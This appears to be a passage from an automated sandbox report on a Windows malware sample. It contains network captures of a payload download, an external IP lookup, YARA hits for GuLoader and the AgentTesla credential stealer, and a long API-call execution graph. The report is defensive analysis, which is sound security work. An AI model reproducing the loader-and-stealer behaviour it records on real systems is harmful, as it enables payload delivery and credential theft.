                                                Data Raw: ed 3c c1 36 f9 46 c2 80 55 d0 29 fb 6d 4b b2 79 84 36 2f 0f c9 40 b4 ac b7 65 57 4a e5 aa 1f 78 e7 f4 f4 c1 09 70 51 09 b3 0c 71 03 8c b9 00 d8 12 d0 35 92 2c 17 6a 7e fc f7 7e ae 1e 75 96 6a 33 c4 69 38 54 4d c3 80 d3 1c f9 61 bc 89 b9 f6 43 11 c5 28 28 d8 f4 14 2e ca 0f 7c 00 cd e0 a4 71 74 7d e5 62 31 b7 2f 53 e5 86 50 e3 e4 57 23 d3 dd 90 6f 9d 62 79 0c d7 23 ae 44 5b 4a dd a2 50 19 05 61 0e e2 34 4b 92 1a e3 f0 31 44 64 d5 9a 85 a9 66 ac 16 72 e2 68 78 36 c1 a5 a8 8a 96 55 74 22 28 c7 48 b9 f3 b5 ff c9 e7 d1 c7 0d ce f6 c3 ac 37 ed 67 46 00 37 40 f1 00 74 5f 28 57 7b 3c f7 6f 5e 4a e4 45 1f fd 95 1e 9c c8 a7 a6 8a eb b1 ae e2 68 87 12 e7 ba 30 e0 cf 09 df 55 a4 c4 cb 61 f2 1d 29 3a dc 2d 20 6d c2 b9 1b 97 cb a2 64 1f c2 e5 75 6c 52 d2 47 86 62 51 29 6e 04 5c b8 ba ec f7 99 30 ed 3a 95 fc a4 17 0c 76 79 7d ef 3f 13 54 da 06 8f 3a ab 4d 09 e1 56 c7 90 82 f2 08 6d 9f 82 40 fb c1 4d ba 81 0a bd 26 28 1f d7 00 2b 15 76 a9 86 60 6d 34 ba 5c 1d 5e c5 30 7a 86 3f 14 6a e9 ae 01 25 2e e0 2a 0d 85 92 19 [TRUNCATED]
                                                Data Ascii: <6FU)mKy6/@eWJxpQq5,j~~uj3i8TMaC((.|qt}b1/SPW#oby#D[JPa4K1Ddfrhx6Ut"(H7gF7@t_(W{<o^JEh0Ua):- mdulRGbQ)n\0:vy}?T:MVm@M&(+v`m4\^0z?j%.*zX}JLf]=h9%}l;G.9K)t4b&U@UfN]My^W;YP7\(C*]g"` 7[|efg-P+.MCD't`8Xq*i#\+-lu_$fu9 ]pf1N|l}[qPa]eG-3oW]3IRtL{@w[b$pTZ5m~lpp}BU)/}6v[>t;+P%gS#S*8]jNWXo=09gsELb=7su1<mTie==dv]hW023E7_(lX+*s?&O1<#J2N]V"IW5wg+6VgG64(j`W'laK{W2cm$JHLH-N'J-`fG55]Pp.
                                                Oct 31, 2024 11:45:28.117310047 CET1236INData Raw: 9a 77 16 d0 84 c2 46 87 b4 63 47 0e 94 b6 f9 30 87 45 17 d7 e7 ae 1a 5a e3 fc fe 44 a0 9f fa 75 ba 34 c6 a3 4a 7a a5 d6 e3 19 7c 01 60 68 ae ca c5 c6 20 2b 5b 0a 61 86 b2 c6 7a 71 e7 6e 78 c2 e7 5f 95 f1 21 7c 29 6f d3 d5 8e d3 61 de e9 e4 b3 17
                                                Data Ascii: wFcG0EZDu4Jz|`h +[azqnx_!|)oa*KjzCCR>BPn9Y<K{f0<SXY[KV~Y_bKuQ]7PKNft;6!/Dt'uoJ|Vm~} Uiy
                                                Oct 31, 2024 11:45:28.117352009 CET424INData Raw: 08 1f fe ca 50 42 1e 3d ea 26 69 7a eb 34 b3 a3 07 17 b6 36 b6 f2 c1 20 4c 47 42 11 e9 40 4d 21 f1 2c b3 0c 53 1a b7 84 d3 4f ab 24 37 5b 29 e6 2a f0 f2 03 bb d9 5a cc 82 0a 0d 24 bd fe 73 41 e4 a9 38 0b 4a 70 3c 63 9d c8 68 94 06 4f 80 6b 5d b1
                                                Data Ascii: PB=&iz46 LGB@M!,SO$7[)*Z$sA8Jp<chOk]+T"}kT`c/T~|v3atd{XRh#\gis-;Jx/^y<=kpEqV36{Q.
                                                Oct 31, 2024 11:45:28.117386103 CET1236INData Raw: d4 55 99 be e4 41 82 a0 39 b4 c7 51 cd c2 64 01 0d c2 9f 52 f3 97 b2 2d 25 ec 9d b2 71 8a 6f 4d c9 2a 31 2e 75 d0 9e 00 ae c8 b7 64 b0 75 7a 22 f7 6a c8 94 54 74 28 4f 54 7e 56 74 51 c1 8d fb 6b 67 f8 fc 89 38 60 76 b7 9e 81 02 2c 52 ce 7d 9c 01
                                                Data Ascii: UA9QdR-%qoM*1.uduz"jTt(OT~VtQkg8`v,R}&+v!u02v8V@6xo-)di`?aL6El;2Wl24#)7@us`NSYZgH#43
                                                Oct 31, 2024 11:45:28.117435932 CET1236INData Raw: e1 02 98 c8 65 f8 32 70 fa b9 4f 5e 15 75 8b 5e 7e 02 cf e0 e3 b6 45 80 98 c6 e9 6a 5b 7f 94 99 e7 69 93 c6 96 3a 5c 9f 32 cf 88 42 e6 8f 50 b0 43 85 41 fb 50 42 2f c8 7a 01 ee 3c e4 c5 69 bf 94 fd 73 89 50 c9 fe 17 df 34 eb 3e 07 c7 f7 38 2e 0d
                                                Data Ascii: e2pO^u^~Ej[i:\2BPCAPB/z<isP4>8.m~YOVw[sywS/?1B^4\{#/j@Qu9HoJ9|V+P!zx#7#|wK~LP/%q,7CL+x_V@}v5z
                                                Oct 31, 2024 11:45:28.117469072 CET424INData Raw: a6 b2 05 2b 25 4c 95 13 79 69 f6 81 26 0f 11 eb 3c 63 99 1c 44 94 05 32 e7 67 5f b5 21 e1 56 ab b7 6e 23 9c a9 7c 8e 49 a4 04 ab 19 fd d9 78 44 85 04 75 9c e6 c7 67 0b 0f f8 0b 6a f8 dd ae 92 c4 d1 a2 fc 06 bd bb af db 39 06 68 22 24 99 67 ee 7c
                                                Data Ascii: +%Lyi&<cD2g_!Vn#|IxDugj9h"$g|aVgU.j!I,*e=aC;h?D@.0;kZ>4{Vrh)n_I<LiKno1.M?`Th1ZY
                                                Oct 31, 2024 11:45:28.117496967 CET424INData Raw: a6 b2 05 2b 25 4c 95 13 79 69 f6 81 26 0f 11 eb 3c 63 99 1c 44 94 05 32 e7 67 5f b5 21 e1 56 ab b7 6e 23 9c a9 7c 8e 49 a4 04 ab 19 fd d9 78 44 85 04 75 9c e6 c7 67 0b 0f f8 0b 6a f8 dd ae 92 c4 d1 a2 fc 06 bd bb af db 39 06 68 22 24 99 67 ee 7c
                                                Data Ascii: +%Lyi&<cD2g_!Vn#|IxDugj9h"$g|aVgU.j!I,*e=aC;h?D@.0;kZ>4{Vrh)n_I<LiKno1.M?`Th1ZY
                                                Oct 31, 2024 11:45:28.117528915 CET1236INData Raw: 0a 35 f2 7e 56 0e 7e e3 8f fc 64 c8 f8 fc fd 60 73 74 cc 49 ee 17 28 78 e6 dd 61 70 82 0b d8 ba ab 8e 29 a9 cf 21 87 a2 fd 3b 9d 30 6b 9d 31 1a e4 5c 9d ec 43 ff d3 55 4a b3 38 2a 38 01 c6 dd 38 08 29 8b ce 45 7b d0 e6 b9 dc f5 b8 a7 39 c7 60 95
                                                Data Ascii: 5~V~d`stI(xap)!;0k1\CUJ8*88)E{9`Ic@XMq5sd7(j="+Qdgn68%TeE?[s<fm{9Zs}}BfAg8i;``=WmCvT(n4|ott]b1] A
                                                Oct 31, 2024 11:45:28.117579937 CET1236INData Raw: cf c6 02 59 11 30 e2 ef 0c 0e bf e3 77 d3 90 cb fe 61 dd 78 e9 16 2a b8 d9 3f 2c 0a 26 55 82 7e af aa 4b a6 f7 a9 66 ae ab e9 37 72 5a 5b 27 ea 77 c9 50 af 9d 0f 9e 17 03 f8 54 8b c6 3b b1 20 93 ab 29 c8 ac ed df 22 ff ba 15 e1 e5 d1 f2 84 bc f4
                                                Data Ascii: Y0wax*?,&U~Kf7rZ['wPT; )"@^U>\t;`L+T[5l++vx-[_J=`TKfS9kpyPj{*4||~p0X,!_Az2jFCD
                                                Oct 31, 2024 11:45:28.117613077 CET1236INData Raw: 67 d5 01 fb 0b 4a 14 dc 97 97 3a d0 9b d7 03 bd bb d1 eb 26 f9 93 e4 45 81 57 eb 5c c9 c7 00 a8 f3 a6 62 fb 8c 49 5a 19 67 26 c2 52 a1 16 30 bd 53 b0 c6 09 1c cd 2e 69 83 9f 40 19 d4 64 05 52 6f 42 19 ba 0a 3b 16 ae 01 aa 0c 07 d0 60 7e 17 d7 a0
                                                Data Ascii: gJ:&EW\bIZg&R0S.i@dRoB;`~JX/Q>kZh<5XU4KtVpH]^*8vN_g^|ATrsd[,CS@TH3Y8eqw5b#3,G[KyW~Y{IwrU
                                                Oct 31, 2024 11:45:28.117645025 CET1236INHTTP/1.1 200 OK
                                                Content-Type: application/octet-stream
                                                Last-Modified: Thu, 31 Oct 2024 07:57:53 GMT
                                                Accept-Ranges: bytes
                                                ETag: "b16ac1966a2bdb1:0"
                                                Server: Microsoft-IIS/8.5
                                                Date: Thu, 31 Oct 2024 10:45:25 GMT
                                                Content-Length: 241728
                                                Data Raw: ed 3c c1 36 f9 46 c2 80 55 d0 29 fb 6d 4b b2 79 84 36 2f 0f c9 40 b4 ac b7 65 57 4a e5 aa 1f 78 e7 f4 f4 c1 09 70 51 09 b3 0c 71 03 8c b9 00 d8 12 d0 35 92 2c 17 6a 7e fc f7 7e ae 1e 75 96 6a 33 c4 69 38 54 4d c3 80 d3 1c f9 61 bc 89 b9 f6 43 11 c5 28 28 d8 f4 14 2e ca 0f 7c 00 cd e0 a4 71 74 7d e5 62 31 b7 2f 53 e5 86 50 e3 e4 57 23 d3 dd 90 6f 9d 62 79 0c d7 23 ae 44 5b 4a dd a2 50 19 05 61 0e e2 34 4b 92 1a e3 f0 31 44 64 d5 9a 85 a9 66 ac 16 72 e2 68 78 36 c1 a5 a8 8a 96 55 74 22 28 c7 48 b9 f3 b5 ff c9 e7 d1 c7 0d ce f6 c3 ac 37 ed 67 46 00 37 40 f1 00 74 5f 28 57 7b 3c f7 6f 5e 4a e4 45 1f fd 95 1e 9c c8 a7 a6 8a eb b1 ae e2 68 87 12 e7 ba 30 e0 cf 09 df 55 a4 c4 cb 61 f2 1d 29 3a dc 2d 20 6d c2 b9 1b 97 cb a2 64 1f c2 e5 75 6c 52 d2 47 86 62 51 29 6e 04 5c b8 ba ec f7 99 30 ed 3a 95 fc a4 17 0c 76 79 7d ef 3f 13 54 da 06 8f 3a ab 4d 09 e1 56 c7 90 82 f2 08 6d 9f 82 40 fb c1 4d ba 81 0a bd 26 28 1f d7 00 2b 15 76 a9 86 60 6d 34 ba 5c 1d 5e c5 30 7a 86 3f 14 6a e9 ae 01 25 2e e0 2a 0d 85 92 19 [TRUNCATED]
                                                Data Ascii: <6FU)mKy6/@eWJxpQq5,j~~uj3i8TMaC((.|qt}b1/SPW#oby#D[JPa4K1Ddfrhx6Ut"(H7gF7@t_(W{<o^JEh0Ua):- mdulRGbQ)n\0:vy}?T:MVm@M&(+v`m4\^0z?j%.*zX}JLf]=h9%}l;G.9K)t4b&U@UfN]My^W;YP7\(C*]g"` 7[|efg-P+.MCD't`8Xq*i#\+-lu_$fu9 ]pf1N|l}[qPa]eG-3oW]3IRtL{@w[b$pTZ5m~lpp}BU)/}6v[>t;+P%gS#S*8]jNWXo=09gsELb=7su1<mTie==dv]hW023E7_(lX+*s?&O1<#J2N]V"IW5wg+6VgG64(j`W'laK{W2cm$JHLH-N'J-`fG55]Pp.
                                                Oct 31, 2024 11:45:28.117906094 CET1236INHTTP/1.1 200 OK
                                                Content-Type: application/octet-stream
                                                Last-Modified: Thu, 31 Oct 2024 07:57:53 GMT
                                                Accept-Ranges: bytes
                                                ETag: "b16ac1966a2bdb1:0"
                                                Server: Microsoft-IIS/8.5
                                                Date: Thu, 31 Oct 2024 10:45:25 GMT
                                                Content-Length: 241728
                                                Data Raw: ed 3c c1 36 f9 46 c2 80 55 d0 29 fb 6d 4b b2 79 84 36 2f 0f c9 40 b4 ac b7 65 57 4a e5 aa 1f 78 e7 f4 f4 c1 09 70 51 09 b3 0c 71 03 8c b9 00 d8 12 d0 35 92 2c 17 6a 7e fc f7 7e ae 1e 75 96 6a 33 c4 69 38 54 4d c3 80 d3 1c f9 61 bc 89 b9 f6 43 11 c5 28 28 d8 f4 14 2e ca 0f 7c 00 cd e0 a4 71 74 7d e5 62 31 b7 2f 53 e5 86 50 e3 e4 57 23 d3 dd 90 6f 9d 62 79 0c d7 23 ae 44 5b 4a dd a2 50 19 05 61 0e e2 34 4b 92 1a e3 f0 31 44 64 d5 9a 85 a9 66 ac 16 72 e2 68 78 36 c1 a5 a8 8a 96 55 74 22 28 c7 48 b9 f3 b5 ff c9 e7 d1 c7 0d ce f6 c3 ac 37 ed 67 46 00 37 40 f1 00 74 5f 28 57 7b 3c f7 6f 5e 4a e4 45 1f fd 95 1e 9c c8 a7 a6 8a eb b1 ae e2 68 87 12 e7 ba 30 e0 cf 09 df 55 a4 c4 cb 61 f2 1d 29 3a dc 2d 20 6d c2 b9 1b 97 cb a2 64 1f c2 e5 75 6c 52 d2 47 86 62 51 29 6e 04 5c b8 ba ec f7 99 30 ed 3a 95 fc a4 17 0c 76 79 7d ef 3f 13 54 da 06 8f 3a ab 4d 09 e1 56 c7 90 82 f2 08 6d 9f 82 40 fb c1 4d ba 81 0a bd 26 28 1f d7 00 2b 15 76 a9 86 60 6d 34 ba 5c 1d 5e c5 30 7a 86 3f 14 6a e9 ae 01 25 2e e0 2a 0d 85 92 19 [TRUNCATED]
                                                Data Ascii: <6FU)mKy6/@eWJxpQq5,j~~uj3i8TMaC((.|qt}b1/SPW#oby#D[JPa4K1Ddfrhx6Ut"(H7gF7@t_(W{<o^JEh0Ua):- mdulRGbQ)n\0:vy}?T:MVm@M&(+v`m4\^0z?j%.*zX}JLf]=h9%}l;G.9K)t4b&U@UfN]My^W;YP7\(C*]g"` 7[|efg-P+.MCD't`8Xq*i#\+-lu_$fu9 ]pf1N|l}[qPa]eG-3oW]3IRtL{@w[b$pTZ5m~lpp}BU)/}6v[>t;+P%gS#S*8]jNWXo=09gsELb=7su1<mTie==dv]hW023E7_(lX+*s?&O1<#J2N]V"IW5wg+6VgG64(j`W'laK{W2cm$JHLH-N'J-`fG55]Pp.
                                                Oct 31, 2024 11:45:28.125927925 CET1236INData Raw: 9d 4c bc 7e 48 2c f6 a5 90 1d ae 93 e1 17 e7 28 a3 b7 df da d5 cd 16 a4 d3 4a 7e e7 b2 5e e5 7b e6 b5 a9 02 24 42 c0 77 9d e4 82 8e 31 12 6f 30 22 f6 1e f5 df 85 c4 02 5d ff 54 96 16 8b 36 1c cc 80 b6 b5 70 ec cb 80 1c e2 12 9d 25 f2 3b dc c8 53
                                                Data Ascii: L~H,(J~^{$Bw1o0"]T6p%;S=G0^>DPd<3jW.6$7_(X+TkJc&w<gJL8k])V=xM$Jyubg+S$V|eVRjh


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.462131172.67.74.1524437880C:\Users\user\Desktop\u9aPQQIwhj.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-31 10:45:30 UTC155OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                Host: api.ipify.org
                                                Connection: Keep-Alive
                                                2024-10-31 10:45:30 UTC211INHTTP/1.1 200 OK
                                                Date: Thu, 31 Oct 2024 10:45:30 GMT
                                                Content-Type: text/plain
                                                Content-Length: 14
                                                Connection: close
                                                Vary: Origin
                                                cf-cache-status: DYNAMIC
                                                Server: cloudflare
                                                CF-RAY: 8db30e534bbd6b88-DFW
                                                2024-10-31 10:45:30 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37
                                                Data Ascii: 173.254.250.77


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:06:43:58
                                                Start date:31/10/2024
                                                Path:C:\Users\user\Desktop\u9aPQQIwhj.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\u9aPQQIwhj.exe"
                                                Imagebase:0x400000
                                                File size:749'170 bytes
                                                MD5 hash:8B6B09811835191F99D4E2E9D94D232C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2410860650.0000000005FBA000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:4
                                                Start time:06:45:13
                                                Start date:31/10/2024
                                                Path:C:\Users\user\Desktop\u9aPQQIwhj.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\u9aPQQIwhj.exe"
                                                Imagebase:0x400000
                                                File size:749'170 bytes
                                                MD5 hash:8B6B09811835191F99D4E2E9D94D232C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2936520542.0000000035FDB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2936520542.0000000035FB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2936520542.0000000035FB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:19.9%
                                                  Dynamic/Decrypted Code Coverage:15.2%
                                                  Signature Coverage:20.9%
                                                  Total number of Nodes:1510
                                                  Total number of Limit Nodes:43
                                                  execution_graph 4932 10001000 4935 1000101b 4932->4935 4942 1000152e 4935->4942 4937 10001020 4938 10001024 4937->4938 4939 10001027 GlobalAlloc 4937->4939 4940 10001555 3 API calls 4938->4940 4939->4938 4941 10001019 4940->4941 4943 10001243 3 API calls 4942->4943 4945 10001534 4943->4945 4944 1000153a 4944->4937 4945->4944 4946 10001546 GlobalFree 4945->4946 4946->4937 4947 404241 lstrcpynW lstrlenW 4948 401d41 GetDC GetDeviceCaps 4949 402b1b 18 API calls 4948->4949 4950 401d5f MulDiv ReleaseDC 4949->4950 4951 402b1b 18 API calls 4950->4951 4952 401d7e 4951->4952 4953 405f0a 18 API calls 4952->4953 4954 401db7 CreateFontIndirectW 4953->4954 4955 4024e6 4954->4955 4956 401a42 4957 402b1b 18 API calls 4956->4957 4958 401a48 4957->4958 4959 402b1b 18 API calls 4958->4959 4960 4019f0 4959->4960 4961 402744 4962 40273f 4961->4962 4962->4961 4963 402754 FindNextFileW 4962->4963 4964 4027a6 4963->4964 4966 40275f 4963->4966 4967 405ee8 lstrcpynW 4964->4967 4967->4966 4975 401cc6 4976 402b1b 18 API calls 4975->4976 4977 401cd9 SetWindowLongW 4976->4977 4978 4029c5 4977->4978 4120 401dc7 4128 402b1b 4120->4128 4122 401dcd 4123 402b1b 18 API calls 4122->4123 4124 401dd6 4123->4124 4125 401de8 EnableWindow 4124->4125 4126 401ddd ShowWindow 4124->4126 4127 4029c5 4125->4127 4126->4127 4129 405f0a 18 API calls 4128->4129 4130 402b2f 4129->4130 4130->4122 4979 4045c8 4980 4045f4 4979->4980 4981 404605 4979->4981 5040 4056a8 GetDlgItemTextW 4980->5040 4983 404611 GetDlgItem 4981->4983 4988 404670 4981->4988 4985 404625 4983->4985 4984 4045ff 4987 40617c 5 API calls 4984->4987 4991 404639 SetWindowTextW 4985->4991 4996 4059de 4 API calls 4985->4996 4986 404754 4989 4048f5 4986->4989 5042 4056a8 GetDlgItemTextW 4986->5042 4987->4981 4988->4986 4988->4989 4993 405f0a 18 API calls 4988->4993 4995 404194 8 API calls 4989->4995 4994 40412d 19 API calls 4991->4994 4992 404784 4997 405a3b 18 API calls 4992->4997 4998 4046e4 SHBrowseForFolderW 4993->4998 4999 404655 4994->4999 5000 404909 4995->5000 5001 40462f 4996->5001 5002 40478a 4997->5002 4998->4986 5003 4046fc CoTaskMemFree 4998->5003 5004 40412d 19 API calls 4999->5004 5001->4991 5005 405933 3 API calls 5001->5005 5043 405ee8 lstrcpynW 5002->5043 5006 405933 3 API calls 5003->5006 5007 404663 5004->5007 5005->4991 5008 404709 5006->5008 5041 404162 SendMessageW 5007->5041 5011 404740 SetDlgItemTextW 5008->5011 5016 405f0a 18 API calls 5008->5016 5011->4986 5012 404669 5014 406252 3 API calls 5012->5014 5013 4047a1 5015 406252 3 API calls 5013->5015 5014->4988 5023 4047a9 5015->5023 5017 404728 lstrcmpiW 5016->5017 5017->5011 5020 404739 lstrcatW 5017->5020 5018 4047e8 5044 405ee8 lstrcpynW 5018->5044 5020->5011 5021 4047ef 5022 4059de 4 API calls 5021->5022 5024 4047f5 GetDiskFreeSpaceW 5022->5024 5023->5018 5026 40597f 2 API calls 5023->5026 5028 40483a 5023->5028 5027 404818 MulDiv 5024->5027 5024->5028 5026->5023 5027->5028 5029 4048a4 5028->5029 5045 404976 5028->5045 5031 4048c7 5029->5031 5033 40140b 2 API calls 5029->5033 5053 40414f KiUserCallbackDispatcher 5031->5053 5032 404896 5035 4048a6 SetDlgItemTextW 5032->5035 5036 40489b 5032->5036 5033->5031 5035->5029 5038 404976 21 API calls 5036->5038 5037 4048e3 5037->4989 5054 40455d 5037->5054 5038->5029 5040->4984 5041->5012 5042->4992 5043->5013 5044->5021 5046 404993 5045->5046 5047 405f0a 18 API calls 5046->5047 5048 4049c8 5047->5048 5049 405f0a 18 API calls 5048->5049 5050 4049d3 5049->5050 5051 405f0a 18 API calls 5050->5051 5052 404a04 lstrlenW wsprintfW SetDlgItemTextW 5051->5052 5052->5032 5053->5037 5055 404570 SendMessageW 5054->5055 5056 40456b 5054->5056 5055->4989 5056->5055 5057 4042ca 5058 4042e2 5057->5058 5059 4043fc 5057->5059 5063 40412d 19 API calls 5058->5063 5060 404466 5059->5060 5062 404538 5059->5062 5065 404437 GetDlgItem SendMessageW 5059->5065 5061 404470 GetDlgItem 5060->5061 5060->5062 5064 40448a 5061->5064 5068 4044f9 5061->5068 5067 404194 8 API calls 5062->5067 5066 404349 5063->5066 5064->5068 5072 4044b0 6 API calls 5064->5072 5088 40414f KiUserCallbackDispatcher 5065->5088 5070 40412d 19 API calls 5066->5070 5071 404533 5067->5071 5068->5062 5073 40450b 5068->5073 5075 404356 CheckDlgButton 5070->5075 5072->5068 5076 404521 5073->5076 5077 404511 SendMessageW 5073->5077 5074 404461 5078 40455d SendMessageW 5074->5078 5086 40414f KiUserCallbackDispatcher 5075->5086 5076->5071 5080 404527 SendMessageW 5076->5080 5077->5076 5078->5060 5080->5071 5081 404374 GetDlgItem 5087 404162 SendMessageW 5081->5087 5083 40438a SendMessageW 5084 4043b0 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5083->5084 5085 4043a7 GetSysColor 5083->5085 5084->5071 5085->5084 5086->5081 5087->5083 5088->5074 5089 4024ca 5090 402b38 18 API calls 5089->5090 5091 4024d1 5090->5091 5094 405b54 GetFileAttributesW CreateFileW 5091->5094 5093 4024dd 5094->5093 5095 401bca 5096 402b1b 18 API calls 5095->5096 5097 401bd1 5096->5097 5098 402b1b 18 API calls 5097->5098 5099 401bdb 5098->5099 5100 401beb 5099->5100 5101 402b38 18 API calls 5099->5101 5102 402b38 18 API calls 5100->5102 5106 401bfb 5100->5106 5101->5100 5102->5106 5103 401c06 5107 402b1b 18 API calls 5103->5107 5104 401c4a 5105 402b38 18 API calls 5104->5105 5108 401c4f 5105->5108 5106->5103 5106->5104 5109 401c0b 5107->5109 5110 402b38 18 API calls 5108->5110 5111 402b1b 18 API calls 5109->5111 5112 401c58 FindWindowExW 5110->5112 5113 401c14 5111->5113 5116 401c7a 5112->5116 5114 401c3a SendMessageW 5113->5114 5115 401c1c SendMessageTimeoutW 5113->5115 5114->5116 5115->5116 5117 40194b 5118 402b1b 18 API calls 5117->5118 5119 401952 5118->5119 5120 402b1b 18 API calls 5119->5120 5121 40195c 5120->5121 5122 402b38 18 API calls 5121->5122 5123 401965 5122->5123 5124 401979 lstrlenW 5123->5124 5125 4019b5 5123->5125 5126 401983 5124->5126 5126->5125 5130 405ee8 lstrcpynW 5126->5130 5128 40199e 5128->5125 5129 4019ab lstrlenW 5128->5129 5129->5125 5130->5128 5134 4019cf 5135 402b38 18 API calls 5134->5135 5136 4019d6 5135->5136 5137 402b38 18 API calls 5136->5137 5138 4019df 5137->5138 5139 4019e6 lstrcmpiW 5138->5139 5140 4019f8 lstrcmpW 5138->5140 5141 4019ec 5139->5141 5140->5141 4209 401e51 4210 402b38 18 API calls 4209->4210 4211 401e57 4210->4211 4212 405192 25 API calls 4211->4212 4213 401e61 4212->4213 4227 405663 CreateProcessW 4213->4227 4216 401ec6 CloseHandle 4219 402791 4216->4219 4217 401e77 WaitForSingleObject 4218 401e89 4217->4218 4220 401e9b GetExitCodeProcess 4218->4220 4221 40628b 2 API calls 4218->4221 4222 401eba 4220->4222 4223 401ead 4220->4223 4224 401e90 WaitForSingleObject 4221->4224 4222->4216 4226 401eb8 4222->4226 4230 405e2f wsprintfW 4223->4230 4224->4218 4226->4216 4228 405692 CloseHandle 4227->4228 4229 401e67 4227->4229 4228->4229 4229->4216 4229->4217 4229->4219 4230->4226 4231 402251 4232 40225f 4231->4232 4233 402259 4231->4233 4234 40226d 4232->4234 4236 402b38 18 API calls 4232->4236 4235 402b38 18 API calls 4233->4235 4237 402b38 18 API calls 4234->4237 4239 40227b 4234->4239 4235->4232 4236->4234 4237->4239 4238 402b38 18 API calls 4240 402284 WritePrivateProfileStringW 4238->4240 4239->4238 4241 4052d1 4242 4052f2 GetDlgItem GetDlgItem GetDlgItem 4241->4242 4243 40547d 4241->4243 4287 404162 SendMessageW 4242->4287 4245 405486 GetDlgItem CreateThread CloseHandle 4243->4245 4246 4054ae 4243->4246 4245->4246 4310 405265 OleInitialize 4245->4310 4248 4054d9 4246->4248 4249 4054c5 ShowWindow ShowWindow 4246->4249 4250 4054fe 4246->4250 4247 405363 4256 40536a GetClientRect GetSystemMetrics SendMessageW SendMessageW 4247->4256 4251 4054e5 4248->4251 4257 405539 4248->4257 4292 404162 SendMessageW 4249->4292 4296 404194 4250->4296 4253 405513 ShowWindow 4251->4253 4254 4054ed 4251->4254 4261 405533 4253->4261 4262 405525 4253->4262 4293 404106 4254->4293 4263 4053d9 4256->4263 4264 4053bd SendMessageW SendMessageW 4256->4264 4257->4250 4258 405547 SendMessageW 4257->4258 4260 40550c 4258->4260 4265 405560 CreatePopupMenu 4258->4265 4269 404106 SendMessageW 4261->4269 4268 405192 25 API calls 4262->4268 4266 4053ec 4263->4266 4267 4053de SendMessageW 4263->4267 4264->4263 4270 405f0a 18 API calls 4265->4270 4288 40412d 4266->4288 4267->4266 4268->4261 4269->4257 4272 405570 AppendMenuW 4270->4272 4274 4055a0 TrackPopupMenu 4272->4274 4275 40558d GetWindowRect 4272->4275 4273 4053fc 4276 405405 ShowWindow 4273->4276 4277 405439 GetDlgItem SendMessageW 4273->4277 4274->4260 4278 4055bb 4274->4278 4275->4274 4279 40541b ShowWindow 4276->4279 4282 405428 4276->4282 4277->4260 4280 405460 SendMessageW SendMessageW 4277->4280 4281 4055d7 SendMessageW 4278->4281 4279->4282 4280->4260 4281->4281 4283 4055f4 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4281->4283 4291 404162 SendMessageW 4282->4291 4285 405619 SendMessageW 4283->4285 4285->4285 4286 405642 GlobalUnlock SetClipboardData CloseClipboard 4285->4286 4286->4260 4287->4247 4289 405f0a 18 API calls 4288->4289 4290 404138 SetDlgItemTextW 4289->4290 4290->4273 4291->4277 4292->4248 4294 404113 SendMessageW 4293->4294 4295 40410d 4293->4295 4294->4250 4295->4294 4297 404235 4296->4297 4298 4041ac GetWindowLongW 4296->4298 4297->4260 4298->4297 4299 4041bd 4298->4299 4300 4041cc GetSysColor 4299->4300 4301 4041cf 4299->4301 4300->4301 4302 4041d5 SetTextColor 4301->4302 4303 4041df SetBkMode 4301->4303 4302->4303 4304 4041f7 GetSysColor 4303->4304 4305 4041fd 4303->4305 4304->4305 4306 404204 SetBkColor 4305->4306 4307 40420e 4305->4307 4306->4307 4307->4297 4308 404221 DeleteObject 4307->4308 4309 404228 CreateBrushIndirect 4307->4309 4308->4309 4309->4297 4317 404179 4310->4317 4312 405288 4316 4052af 4312->4316 4320 401389 4312->4320 4313 404179 SendMessageW 4314 4052c1 OleUninitialize 4313->4314 4316->4313 4318 404191 4317->4318 4319 404182 SendMessageW 4317->4319 4318->4312 4319->4318 4322 401390 4320->4322 4321 4013fe 4321->4312 4322->4321 4323 4013cb MulDiv SendMessageW 4322->4323 4323->4322 4324 401752 4325 402b38 18 API calls 4324->4325 4326 401759 4325->4326 4327 401781 4326->4327 4328 401779 4326->4328 4364 405ee8 lstrcpynW 4327->4364 4363 405ee8 lstrcpynW 4328->4363 4331 40177f 4335 40617c 5 API calls 4331->4335 4332 40178c 4333 405933 3 API calls 4332->4333 4334 401792 lstrcatW 4333->4334 4334->4331 4351 40179e 4335->4351 4336 40622b 2 API calls 4336->4351 4337 405b2f 2 API calls 4337->4351 4339 4017b0 CompareFileTime 4339->4351 4340 401870 4341 405192 25 API calls 4340->4341 4343 40187a 4341->4343 4342 401847 4344 405192 25 API calls 4342->4344 4352 40185c 4342->4352 4346 403060 46 API calls 4343->4346 4344->4352 4345 405ee8 lstrcpynW 4345->4351 4347 40188d 4346->4347 4348 4018a1 SetFileTime 4347->4348 4350 4018b3 CloseHandle 4347->4350 4348->4350 4349 405f0a 18 API calls 4349->4351 4350->4352 4353 4018c4 4350->4353 4351->4336 4351->4337 4351->4339 4351->4340 4351->4342 4351->4345 4351->4349 